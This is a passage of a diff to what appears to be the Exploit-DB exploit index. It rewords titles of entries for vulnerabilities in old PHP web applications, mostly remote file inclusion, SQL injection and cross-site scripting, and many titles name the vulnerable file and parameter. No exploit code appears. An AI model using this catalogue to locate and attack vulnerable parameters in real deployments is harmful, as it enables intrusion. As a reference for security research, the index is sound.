1.6 - 'codes-english.php?show' Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 +28212,platforms/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - 'picture.php?img' Cross-Site Scripting",2006-07-12,simo64,php,webapps,0 +28214,platforms/php/webapps/28214.txt,"PhotoCycle 1.0 - 'PhotoCycle.php' Cross-Site Scripting",2006-07-13,Luny,php,webapps,0 28215,platforms/php/webapps/28215.txt,"PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion",2006-07-13,Solpot,php,webapps,0 28216,platforms/php/webapps/28216.txt,"FlatNuke 2.5.7 - 'index.php' Remote File Inclusion",2006-07-13,rgod,php,webapps,0 28217,platforms/php/webapps/28217.txt,"Forum 5 - 'pm.php' Local File Inclusion",2006-07-13,rgod,php,webapps,0 -28219,platforms/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 +28219,platforms/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0 28223,platforms/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",php,webapps,0 -28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusion",2006-07-17,"Tan Chew Keong",php,webapps,0 +28229,platforms/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusions",2006-07-17,"Tan Chew Keong",php,webapps,0 28231,platforms/php/webapps/28231.txt,"ListMessenger 0.9.3 - LM_Path Parameter Remote File Inclusion",2006-07-17,xoron,php,webapps,0 28233,platforms/php/webapps/28233.txt,"Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 28236,platforms/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,ios,webapps,0 @@ -30377,27 +30378,27 @@ id,file,description,date,author,platform,type,port 28247,platforms/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 -28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php b' Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0 +28250,platforms/php/webapps/28250.txt,"Geodesic Solutions (Multiple Products) - 'index.php b' SQL Injection",2006-07-20,LBDT,php,webapps,0 28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,php,webapps,0 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 -28261,platforms/php/webapps/28261.txt,"RadScripts - 'a_editpage.php Filename' Parameter Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 -28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 +28261,platforms/php/webapps/28261.txt,"RadScripts - 'a_editpage.php?Filename' Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 +28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 -28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 -28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 -28269,platforms/php/webapps/28269.txt,"LinksCaffe 3.0 - links.php newdays Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 -28270,platforms/php/webapps/28270.txt,"LinksCaffe 3.0 - menu.inc.php Multiple Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 +28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - 'links.php' Multiple SQL Injections",2006-07-25,simo64,php,webapps,0 +28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - 'counter.php?tablewidth' Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 +28269,platforms/php/webapps/28269.txt,"LinksCaffe 3.0 - 'links.php?newdays' Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 +28270,platforms/php/webapps/28270.txt,"LinksCaffe 3.0 - 'menu.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-25,simo64,php,webapps,0 28272,platforms/php/webapps/28272.txt,"Zimplit CMS 3.0 - Multiple Vulnerabilities",2013-09-13,"Yashar shahinzadeh",php,webapps,0 -28274,platforms/php/webapps/28274.txt,"PHP Pro Bid 5.2.4 - auctionsearch.php advsrc Parameter Cross-Site Scripting",2006-07-25,"EllipSiS Security",php,webapps,0 -28275,platforms/php/webapps/28275.txt,"PHP Pro Bid 5.2.4 - viewfeedback.php Multiple Parameter SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 -28276,platforms/php/webapps/28276.txt,"PHP Pro Bid 5.2.4 - categories.php orderType Parameter SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 +28274,platforms/php/webapps/28274.txt,"PHP Pro Bid 5.2.4 - 'auctionsearch.php?advsrc' Cross-Site Scripting",2006-07-25,"EllipSiS Security",php,webapps,0 +28275,platforms/php/webapps/28275.txt,"PHP Pro Bid 5.2.4 - 'viewfeedback.php' Multiple SQL Injections",2006-07-25,"EllipSiS Security",php,webapps,0 +28276,platforms/php/webapps/28276.txt,"PHP Pro Bid 5.2.4 - 'categories.php?orderType' SQL Injection",2006-07-25,"EllipSiS Security",php,webapps,0 28278,platforms/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",jsp,webapps,0 28279,platforms/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - Cross-Site Request Forgery",2013-09-14,"Matias Mingorance Svensson",hardware,webapps,0 28280,platforms/php/webapps/28280.txt,"wwwThreads - calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 -28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 -28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 +28281,platforms/php/webapps/28281.txt,"phpBB-Auction 1.x - 'auction_room.php?ar' SQL Injection",2006-07-26,l2odon,php,webapps,0 +28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - 'auction_store.php?u' SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 28291,platforms/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 @@ -30409,16 +30410,16 @@ id,file,description,date,author,platform,type,port 28302,platforms/php/webapps/28302.txt,"Joomla! Component Liga Manager Online 2.0 - Remote File Inclusion",2006-07-30,vitux.manis,php,webapps,0 28303,platforms/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - Protect.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 28304,platforms/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - top.php SQL Injection",2006-07-29,SirDarckCat,php,webapps,0 -28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 - operator_chattranscript.php chatid Parameter Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 -28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - signup.php site_name Parameter SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 -28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple Parameter SQL Injections",2006-07-31,SirDarckCat,php,webapps,0 -28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 +28305,platforms/php/webapps/28305.txt,"Ajax Chat 0.1 - 'operator_chattranscript.php?chatid' Traversal Arbitrary File Access",2006-07-31,SirDarckCat,php,webapps,0 +28306,platforms/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,php,webapps,0 +28307,platforms/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,php,webapps,0 +28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 -28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php subdir' Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 +28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php?subdir' Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28318,platforms/php/webapps/28318.txt,"Knusperleicht Quickie - Quick_Path Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 @@ -30426,8 +30427,8 @@ id,file,description,date,author,platform,type,port 28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - 'error.php' Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0 28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - 'UpdatePF.php' Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0 28324,platforms/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0 -28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0 -28327,platforms/php/webapps/28327.txt,"VWar 1.x - war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0 +28326,platforms/php/webapps/28326.txt,"VWar 1.x - 'war.php?page' Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0 +28327,platforms/php/webapps/28327.txt,"VWar 1.x - 'war.php' Multiple SQL Injections",2006-08-03,mfoxhacker,php,webapps,0 28329,platforms/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28330,platforms/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,php,webapps,0 28339,platforms/asp/webapps/28339.txt,"Anychart 3.0 - Password Parameter SQL Injection",2006-08-03,sCORPINo,asp,webapps,0 @@ -30435,7 +30436,7 @@ id,file,description,date,author,platform,type,port 28342,platforms/php/webapps/28342.txt,"vBulletin 3.0.14 - global.php Encoded URL Cross-Site Scripting",2006-08-05,imei,php,webapps,0 28509,platforms/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",php,webapps,0 28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - 'profile.php' Multiple SQL Injections",2006-08-07,"Chris Boulton",php,webapps,0 -28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 +28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusions",2006-08-07,Matdhule,php,webapps,0 28350,platforms/php/webapps/28350.txt,"VWar 1.5 - 'war.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28351,platforms/php/webapps/28351.txt,"VWar 1.5 - 'member.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28352,platforms/php/webapps/28352.txt,"VWar 1.5 - 'calendar.php' vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 @@ -30447,28 +30448,28 @@ id,file,description,date,author,platform,type,port 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0 28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0 -28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 +28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - 'Big.php' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 -28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0 +28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusions",2006-08-10,x0r0n,php,webapps,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 28388,platforms/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,php,webapps,0 -28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusion",2006-08-15,Crackers_Child,php,webapps,0 -28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 +28390,platforms/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusions",2006-08-15,Crackers_Child,php,webapps,0 +28392,platforms/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php?autoLoadConfig[999][0][loadFile]' Remote File Inclusion",2006-08-15,"James Bercegay",php,webapps,0 28393,platforms/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,asp,webapps,0 28396,platforms/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,php,webapps,0 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0 -28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0 -28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 -28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 +28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - 'Dir_Plugins' Multiple Remote File Inclusions",2006-08-17,Drago84,php,webapps,0 +28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusions",2006-08-18,O.U.T.L.A.W,php,webapps,0 +28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Multiple Remote File Inclusions",2006-08-18,Crackers_Child,php,webapps,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 -28409,platforms/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 -28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28409,platforms/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 @@ -30476,11 +30477,11 @@ id,file,description,date,author,platform,type,port 28415,platforms/php/webapps/28415.txt,"cPanel 10.x - 'showfile.html' File Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 28416,platforms/php/webapps/28416.txt,"Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - TCMS_Administer Parameter Remote File Inclusion",2006-08-21,You_You,php,webapps,0 -28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 +28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,php,webapps,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 - 'index.php' Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0 -28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 +28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - 'HPEInc' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 @@ -30492,32 +30493,32 @@ id,file,description,date,author,platform,type,port 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 -28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0 +28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusions",2006-08-29,sCORPINo,php,webapps,0 28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass",2006-07-25,HoangYenXinhDep,php,webapps,0 28443,platforms/asp/webapps/28443.html,"Digiappz Freekot 1.01 - ASP SQL Injection",2006-08-30,FarhadKey,asp,webapps,0 -28444,platforms/php/webapps/28444.txt,"Alstrasoft Template Seller - Config[Template_Path] Multiple Remote File Inclusion",2006-08-30,night_warrior771,php,webapps,0 +28444,platforms/php/webapps/28444.txt,"Alstrasoft Template Seller - 'Config[Template_Path]' Multiple Remote File Inclusions",2006-08-30,night_warrior771,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - 'admin/newsletters.php' page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - 'admin/orders_status.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 -28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - 'admin/products_attributes.php page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - 'admin/orders_status.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - 'admin/products_attributes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com - Learncenter.asp Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 -28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 - Home_Path Parameter Multiple Remote File Inclusion",2006-08-31,Matdhule,php,webapps,0 -28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusion",2006-09-01,MATASANOS,php,webapps,0 +28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 - 'Home_Path' Multiple Remote File Inclusions",2006-08-31,Matdhule,php,webapps,0 +28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusions",2006-09-01,MATASANOS,php,webapps,0 28452,platforms/php/webapps/28452.txt,"WordPress Plugin Lazy SEO 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 -28453,platforms/php/webapps/28453.txt,"EZContents 2.0.3 - event_list.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28454,platforms/php/webapps/28454.txt,"EZContents 2.0.3 - calendar.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28455,platforms/php/webapps/28455.txt,"EZContents 2.0 - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28456,platforms/php/webapps/28456.txt,"EZContents 2.0.3 - showguestbook.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28457,platforms/php/webapps/28457.txt,"EZContents 2.0.3 - showlinks.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28453,platforms/php/webapps/28453.txt,"EZContents 2.0.3 - 'event_list.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28454,platforms/php/webapps/28454.txt,"EZContents 2.0.3 - 'calendar.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28455,platforms/php/webapps/28455.txt,"EZContents 2.0 - 'gallery_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28456,platforms/php/webapps/28456.txt,"EZContents 2.0.3 - 'showguestbook.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28457,platforms/php/webapps/28457.txt,"EZContents 2.0.3 - 'showlinks.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28458,platforms/php/webapps/28458.txt,"EZContents 2.0.3 - 'shownews.php' GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28459,platforms/php/webapps/28459.txt,"EZContents 2.0.3 - showpoll.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28460,platforms/php/webapps/28460.txt,"EZContents 2.0.3 - review_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28461,platforms/php/webapps/28461.txt,"EZContents 2.0.3 - search.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28462,platforms/php/webapps/28462.txt,"EZContents 2.0.3 - toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28459,platforms/php/webapps/28459.txt,"EZContents 2.0.3 - 'showpoll.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28460,platforms/php/webapps/28460.txt,"EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28461,platforms/php/webapps/28461.txt,"EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28462,platforms/php/webapps/28462.txt,"EZContents 2.0.3 - 'toprated.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 - profile.php Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps,0 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,php,webapps,0 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 - IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0 @@ -30535,52 +30536,52 @@ id,file,description,date,author,platform,type,port 28497,platforms/php/webapps/28497.txt,"Vikingboard 0.1b - 'help.php' 